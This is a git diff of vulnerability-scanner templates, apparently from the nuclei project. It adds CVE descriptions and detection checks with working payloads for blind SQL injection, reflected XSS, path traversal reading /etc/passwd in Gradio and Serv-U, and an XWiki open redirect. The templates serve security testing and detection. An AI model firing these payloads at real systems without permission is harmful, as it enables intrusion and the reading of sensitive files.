{"ID":"CVE-2024-37393","Info":{"Name":"SecurEnvoy Two Factor Authentication - LDAP Injection","Severity":"critical","Description":"Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37393.yaml"}
|
||||||
{"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"}
|
{"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"}
|
||||||
{"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"}
|
{"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"}
|
||||||
{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}
|
{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
ccfb062d74fe49f673c3566b7bedbb47
|
5bf79d4f9b6c31dc26f1ae2f9acb7675
|
||||||
|
|
|
@ -0,0 +1,50 @@
|
||||||
|
id: time-based-sqli
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Time-Based Blind SQL Injection
|
||||||
|
author: 0xKayala
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
This Template detects time-based Blind SQL Injection vulnerability
|
||||||
|
tags: sqli,dast,time-based,blind
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "duration<=7"
|
||||||
|
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
injection:
|
||||||
|
- "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
|
||||||
|
- "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
|
||||||
|
- "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
|
||||||
|
- "if(now()=sysdate(),SLEEP(7),0)"
|
||||||
|
- "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
|
||||||
|
- "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
|
||||||
|
|
||||||
|
fuzzing:
|
||||||
|
- part: query
|
||||||
|
type: replace
|
||||||
|
mode: single
|
||||||
|
fuzz:
|
||||||
|
- "{{injection}}"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "duration>=7 && duration <=16"
|
||||||
|
# digest: 4a0a00473045022100d675885ab7a3077f93b0db61d16c0c497b081929390f70eaf3f83176718297bc0220757a070de885db66f2a5855ee6ae327d14d04b04f0ce5cfc27db288563341cfe:922c64590222798bb761d5b6d8e72950
|
|
@ -1,8 +1,8 @@
|
||||||
id: reflected-xss
|
id: reflected-xss
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Reflected Cross Site Scripting
|
name: Reflected Cross-Site Scripting
|
||||||
author: pdteam
|
author: pdteam,0xKayala
|
||||||
severity: medium
|
severity: medium
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
|
@ -19,7 +19,9 @@ http:
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
reflection:
|
reflection:
|
||||||
- "'\"><{{first}}"
|
- "'\"><{{first}}>"
|
||||||
|
- "'><{{first}}>"
|
||||||
|
- "\"><{{first}}>"
|
||||||
|
|
||||||
fuzzing:
|
fuzzing:
|
||||||
- part: query
|
- part: query
|
||||||
|
@ -40,4 +42,4 @@ http:
|
||||||
part: header
|
part: header
|
||||||
words:
|
words:
|
||||||
- "text/html"
|
- "text/html"
|
||||||
# digest: 4a0a0047304502205821d73014fc8d11f73cd6310b813fe726e0a079b64f64e68b4ec264862ca17e0221008b5588348307f431509fb585b4920dc44a9de1f9330154b012be8dc4520fd47d:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100fe9d1b6a33bc101017c0dabac57b282164ad7a316747fb641b1be7dd534178b2022100b1b90ca968e766279c306212b849ce875ae2beaced34248794387b56192c1878:922c64590222798bb761d5b6d8e72950
|
|
@ -1964,6 +1964,8 @@ x-from
|
||||||
X-Fruit
|
X-Fruit
|
||||||
X-Fully-Authenticated
|
X-Fully-Authenticated
|
||||||
X-Furcadia-Allow-Caching
|
X-Furcadia-Allow-Caching
|
||||||
|
x-functions-key
|
||||||
|
x-functions-clientid
|
||||||
x-fv
|
x-fv
|
||||||
X-Galleries
|
X-Galleries
|
||||||
X-Gallery-Type
|
X-Gallery-Type
|
||||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -48,7 +48,13 @@ http:
|
||||||
regex:
|
regex:
|
||||||
- (?mi)window\.location\.replace\(".*alert\(1337\)
|
- (?mi)window\.location\.replace\(".*alert\(1337\)
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- window.location.href.indexOf
|
||||||
|
negative: true
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4b0a00483046022100ecd7675c422b5c9949a8ab6d201f35ee87e4502aad45359f825eb31c2f2fbd72022100aa92159e5d4b1010b07101e6b6f47d858170d3f8e97aa5db3c6c7a259bfe4b71:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502201c457a2f1b36aa9047f64d583625469bc74369b0b7e4aabe3b116e0738efe55c0221009fbcbd6ae813de05fe1f4fcd785a0cb566dba7d3d8f3ed26faf9555b57561095:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,54 @@
|
||||||
|
id: CVE-2021-43831
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Gradio < 2.5.0 - Arbitrary File Read
|
||||||
|
author: isacaya
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Files on the host computer can be accessed from the Gradio interface
|
||||||
|
impact: |
|
||||||
|
An attacker would be able to view the contents of a file on the computer.
|
||||||
|
remediation: |
|
||||||
|
Update to version 2.5.0.
|
||||||
|
reference:
|
||||||
|
- https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr
|
||||||
|
- https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.7
|
||||||
|
cve-id: CVE-2021-43831
|
||||||
|
cwe-id: CWE-22
|
||||||
|
epss-score: 0.00063
|
||||||
|
epss-percentile: 0.26511
|
||||||
|
cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
|
||||||
|
metadata:
|
||||||
|
vendor: gradio_project
|
||||||
|
product: gradio
|
||||||
|
framework: python
|
||||||
|
shodan-query: title:"Gradio"
|
||||||
|
tags: cve,cve2021,lfi,gradio
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
path:
|
||||||
|
- /etc/passwd
|
||||||
|
- /windows/win.ini
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
- "\\[(font|extension|file)s\\]"
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 490a00463044022032ecd11c32d5ba5b3a614d6572928a93718eecf820b73a7ed7613c012085b9af02207bceba36fe78c3968f2ca537e592c5f1c5e3aee5a141a64a0d7a9932c9f3af4d:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,42 @@
|
||||||
|
id: CVE-2023-32068
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: XWiki - Open Redirect
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
XWiki Platform is vulnerable to open redirect attacks due to improper validation of the xredirect parameter. This allows an attacker to redirect users to an arbitrary website. The vulnerability is patched in versions 14.10.4 and 15.0.
|
||||||
|
impact: |
|
||||||
|
An attacker can craft malicious URLs to redirect users to malicious websites.
|
||||||
|
remediation: |
|
||||||
|
Implement proper input validation and sanitize user-controlled input to prevent open redirect vulnerabilities.
|
||||||
|
reference:
|
||||||
|
- https://jira.xwiki.org/browse/XWIKI-20096
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-32068
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-32068
|
||||||
|
cwe-id: CWE-601
|
||||||
|
epss-score: 0.00149
|
||||||
|
epss-percentile: 0.50372
|
||||||
|
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
vendor: xwiki
|
||||||
|
product: xwiki
|
||||||
|
shodan-query: html:"data-xwiki-reference"
|
||||||
|
fofa-query: body="data-xwiki-reference"
|
||||||
|
tags: cve,cve2023,xwiki,redirect
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//oast.me"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
|
||||||
|
# digest: 490a00463044022022611f58439e1b8aa2bf5df976f3774aa14e202e26280efda8267481141f80de022050cc9f2a7c4906ef5bc096ec3ca0ccad1892f139eae285db8a964bd5a5b11f7d:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,84 @@
|
||||||
|
id: CVE-2023-51449
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Gradio Hugging Face - Local File Inclusion
|
||||||
|
author: nvn1729
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33
|
||||||
|
reference:
|
||||||
|
- https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
|
||||||
|
- https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-51449
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2023-51449
|
||||||
|
cwe-id: CWE-22
|
||||||
|
epss-score: 0.00064
|
||||||
|
epss-percentile: 0.27836
|
||||||
|
cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
vendor: gradio_project
|
||||||
|
product: gradio
|
||||||
|
framework: python
|
||||||
|
shodan-query: html:"__gradio_mode__"
|
||||||
|
fofa-query: body="__gradio_mode__"
|
||||||
|
tags: cve,cve2024,lfi,gradio,unauth,intrusive
|
||||||
|
|
||||||
|
variables:
|
||||||
|
str: '{{rand_base(8)}}'
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /upload HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311
|
||||||
|
|
||||||
|
-----------------------------250033711231076532771336998311
|
||||||
|
Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
|
||||||
|
Content-Type: application/octet-stream
|
||||||
|
|
||||||
|
{{str}}
|
||||||
|
-----------------------------250033711231076532771336998311--
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /file={{download_path}}{{path}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
name: download_path
|
||||||
|
internal: true
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- "\\[\"(.+)okmijnuhbygv\"\\]"
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
path:
|
||||||
|
- ..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
|
||||||
|
- ../../../../../../../../../../../../../../../etc/passwd
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
- "\\[(font|extension|file)s\\]"
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: content_type
|
||||||
|
words:
|
||||||
|
- "text/plain"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 490a0046304402202afd5a76a8709b9e353a87ab56a8aef3d1afa2739156058f4a7cd46c851390400220687bf99017b86a6013b449d53d1c9b790e8e7b4ba7aec6fe2292b87a11d4527c:922c64590222798bb761d5b6d8e72950
|
|
@ -1,11 +1,11 @@
|
||||||
id: CVE-2024-1561
|
id: CVE-2024-1561
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Gradio Applications - Local File Read
|
name: Gradio 4.3-4.12 - Local File Read
|
||||||
author: Diablo
|
author: nvn1729,Diablo
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Local file read by calling arbitrary methods of Components class
|
Local file read by calling arbitrary methods of Components class between Gradio versions 4.3-4.12
|
||||||
impact: |
|
impact: |
|
||||||
Successful exploitation of this vulnerability could allow an attacker to read files on the server
|
Successful exploitation of this vulnerability could allow an attacker to read files on the server
|
||||||
remediation: |
|
remediation: |
|
||||||
|
@ -16,6 +16,7 @@ info:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-1561
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-1561
|
||||||
- https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
|
- https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
|
||||||
- https://www.gradio.app/changelog#4-13-0
|
- https://www.gradio.app/changelog#4-13-0
|
||||||
|
- https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
@ -25,50 +26,52 @@ info:
|
||||||
epss-percentile: 0.36659
|
epss-percentile: 0.36659
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 3
|
max-request: 2
|
||||||
shodan-query: html:"__gradio_mode__"
|
shodan-query: html:"__gradio_mode__"
|
||||||
tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
|
tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
|
||||||
flow: http(1) && http(2) && http(3)
|
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
|
||||||
- |
|
|
||||||
GET /config HTTP/1.1
|
|
||||||
Host: {{Hostname}}
|
|
||||||
|
|
||||||
extractors:
|
|
||||||
- type: json
|
|
||||||
name: first-component
|
|
||||||
part: body
|
|
||||||
group: 1
|
|
||||||
json:
|
|
||||||
- '.components[0].id'
|
|
||||||
internal: true
|
|
||||||
|
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
POST /component_server HTTP/1.1
|
POST /component_server HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
|
|
||||||
{"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
|
{"component_id": "1", "data": "{{path}}", "fn_name": "move_resource_to_block_cache", "session_hash": "aaaaaaaaaaa"}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /file={{download_path}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
name: tmpath
|
part: body
|
||||||
regex:
|
name: download_path
|
||||||
- \/[a-zA-Z0-9\/]+
|
|
||||||
internal: true
|
internal: true
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- "\"?([^\"]+)"
|
||||||
|
|
||||||
- raw:
|
payloads:
|
||||||
- |
|
path:
|
||||||
GET /file={{tmpath}} HTTP/1.1
|
- c:\\windows\\win.ini
|
||||||
Host: {{Hostname}}
|
- /etc/passwd
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: regex
|
||||||
dsl:
|
part: body
|
||||||
- regex('root:.*:0:0:', body)
|
regex:
|
||||||
- 'contains(header, "text/plain")'
|
- "root:.*:0:0:"
|
||||||
condition: and
|
- "\\[(font|extension|file)s\\]"
|
||||||
# digest: 490a004630440220228b8f9ed4c8b48faa786cd1c48413831ef219341e029831e13f0a25f92be8a902204ff8d692224fa018c063b78b72507ddf2e92f2a750fd3b5cd0c01bc2f32a762f:922c64590222798bb761d5b6d8e72950
|
condition: or
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: content_type
|
||||||
|
words:
|
||||||
|
- "text/plain"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
|
@ -0,0 +1,74 @@
|
||||||
|
id: CVE-2024-1728
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Gradio > 4.19.1 UploadButton - Path Traversal
|
||||||
|
author: isacaya
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.
|
||||||
|
impact: |
|
||||||
|
Attackers can exploit this vulnerability to read arbitrary files on the filesystem, such as private SSH keys, by manipulating the file path in the request to the `/queue/join` endpoint. This issue could potentially lead to remote code execution. The vulnerability is present in the handling of file upload paths, allowing attackers to redirect file uploads to unintended locations on the server.
|
||||||
|
remediation: |
|
||||||
|
Update to version 4.19.2.
|
||||||
|
reference:
|
||||||
|
- https://github.com/gradio-app/gradio/commit/16fbe9cd0cffa9f2a824a0165beb43446114eec7
|
||||||
|
- https://huntr.com/bounties/9bb33b71-7995-425d-91cc-2c2a2f2a068a
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-1728
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2024-1728
|
||||||
|
cwe-id: CWE-22
|
||||||
|
epss-score: 0.00044
|
||||||
|
epss-percentile: 0.10164
|
||||||
|
metadata:
|
||||||
|
max-request: 5
|
||||||
|
verified: true
|
||||||
|
vendor: gradio
|
||||||
|
product: gradio
|
||||||
|
shodan-query: html:"__gradio_mode__"
|
||||||
|
tags: cve,cve2024,lfi,gradio,intrusive
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /queue/join? HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"data":[[{"path":"{{path}}","url":"{{BaseURL}}/file=/help","orig_name":"CHANGELOG.md","size":3549,"mime_type":"text/markdown"}]],"event_data":null,"fn_index":0,"trigger_id":2,"session_hash":"{{randstr}}"}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /queue/data?session_hash={{randstr}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /file={{extracted_path}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: extracted_path
|
||||||
|
regex:
|
||||||
|
- "/tmp/gradio/.*/passwd"
|
||||||
|
- "C:.*\\win\\.ini"
|
||||||
|
internal: true
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
path:
|
||||||
|
- /etc/passwd
|
||||||
|
- /windows/win.ini
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
- "\\[(font|extension|file)s\\]"
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
# digest: 4a0a0047304502200f825f20fad4b54e4c1edb052482ff3d57c02b63e05a9cf6227b37d39ebee112022100b36cc92a5b2685c8da867167fa0fdc31e99e6d9d6a461ff14467d518c3904dc2:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,43 @@
|
||||||
|
id: CVE-2024-2621
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Fujian Kelixin Communication - Command Injection
|
||||||
|
author: DhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php.
|
||||||
|
reference:
|
||||||
|
- https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-pwd_update.php.pdf
|
||||||
|
- https://vuldb.com/?ctiid.257198
|
||||||
|
- https://vuldb.com/?id.257198
|
||||||
|
- https://github.com/NaInSec/CVE-LIST
|
||||||
|
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-2621
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
|
||||||
|
cvss-score: 6.3
|
||||||
|
cve-id: CVE-2024-2621
|
||||||
|
cwe-id: CWE-89
|
||||||
|
epss-score: 0.00045
|
||||||
|
epss-percentile: 0.15047
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
fofa-query: body="app/structure/departments.php" || app="指挥调度管理平台"
|
||||||
|
tags: cve,cve2024,sqli,fujian,rce
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout 15s
|
||||||
|
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(6)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=6'
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains_all(body,"msg\":","header\":","code\":")'
|
||||||
|
condition: and
|
||||||
|
# digest: 4a0a00473045022100a52b0c5b76efaf890e2a47563d494a96fce85d7358a34a0b2ed4027e0dc1c2d202206721b9c12ec93f014b0111b14d53ef8e69c79a19ec1eb23f367c7823881fcd2f:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,53 @@
|
||||||
|
id: CVE-2024-28995
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SolarWinds Serv-U - Directory Traversal
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.
|
||||||
|
reference:
|
||||||
|
- https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-28995
|
||||||
|
- https://x.com/stephenfewer/status/1801191416741130575
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2024-28995
|
||||||
|
cwe-id: CWE-22
|
||||||
|
cpe: cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
vendor: solarwinds
|
||||||
|
product: serv-u
|
||||||
|
shodan-query: html:"Serv-U"
|
||||||
|
fofa-query: server="Serv-U"
|
||||||
|
tags: cve,cve2024,lfi,solarwinds,serv-u
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
- "\\[(font|extension|file)s\\]"
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(header, "Serv-U")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
||||||
|
# digest: 4a0a00473045022100f7464125ccd5146080c76c675872c18c8bd0eb548bb8b1ba0cb9a979e4a8db9b02204c5cfd2b1ac281a288ed84c4fe0fe06376db38e710553793adf0216811a0a537:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,41 @@
|
||||||
|
id: CVE-2024-31750
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: F-logic DataCube3 - SQL Injection
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
SQL injection vulnerability in f-logic datacube3 v.1.0 allows a remote attacker to obtain sensitive information via the req_id parameter.
|
||||||
|
reference:
|
||||||
|
- https://github.com/lampSEC/semcms/blob/main/datacube3.md
|
||||||
|
